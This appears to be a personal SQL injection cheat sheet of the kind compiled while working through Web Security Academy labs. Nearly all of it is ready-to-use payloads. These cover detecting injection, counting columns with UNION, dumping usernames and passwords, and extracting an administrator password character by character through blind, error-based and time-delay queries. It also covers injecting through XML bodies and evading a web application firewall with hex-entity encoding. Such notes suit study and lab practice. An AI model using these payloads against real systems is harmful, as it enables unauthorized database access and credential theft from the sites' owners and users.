SQLi

SQL injection cheat sheet | Web Security AcademyWebSecAcademy

Detection

Insert special chars:

'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
'  # required for XML content

SQLi union

Need to determine number of columns

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

#for oracle
' UNION SELECT NULL FROM DUAL--

The payloads described use the double-dash comment sequence -- to comment out the remainder of the original query following the injection point.

On MySQL, the double-dash sequence must be followed by a space. Alternatively, the hash character # can be used to identify a comment.

Test for string column

' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--

Multiple column in one

' UNION SELECT username || '~' || password FROM users--
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

Blind SQLi

Start with simple condition and compare results

…xyz' AND '1'='1
…xyz' AND '1'='2

#table exist
xyz' AND (SELECT 'a' FROM users LIMIT 1)='a 

#user exist
xyz' and (select 'a' from users where username = 'administrator')='a'

#password length
xyz' and (select 'a' from users where username = 'administrator' and length(password)=20)='a'

#password chars
xyz' and (SELECT SUBSTRING(password,1,1) from users where username = 'administrator')='b'

If it works try with more complex conditions

xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm

xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

Error blind sqli

If simple condition not change behavior, try to do error of db

xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a

xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

Visible error sqli

Especially string literal when other type expected, try CAST

CAST((SELECT example_column FROM example_table) AS int)--

' AND 1=CAST((SELECT username FROM users) AS int)--
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

Time Delays

#simple condition
'; IF (1=2) WAITFOR DELAY '0:0:10'-


#user condition
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--

Injection inside xml body

Try to do simple data manipulation

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>
1+1
</productId><storeId>1</storeId></stockCheck>


<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
1 union select password from users limit 1
</productId>
<storeId>1</storeId>
</stockCheck>

If waf try to bypass with Hackvector encode with hex_entities/dec_entities

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>
1
</productId><storeId><@hex_entities>1 union select password from users where username='administrator'<@/hex_entities></storeId></stockCheck>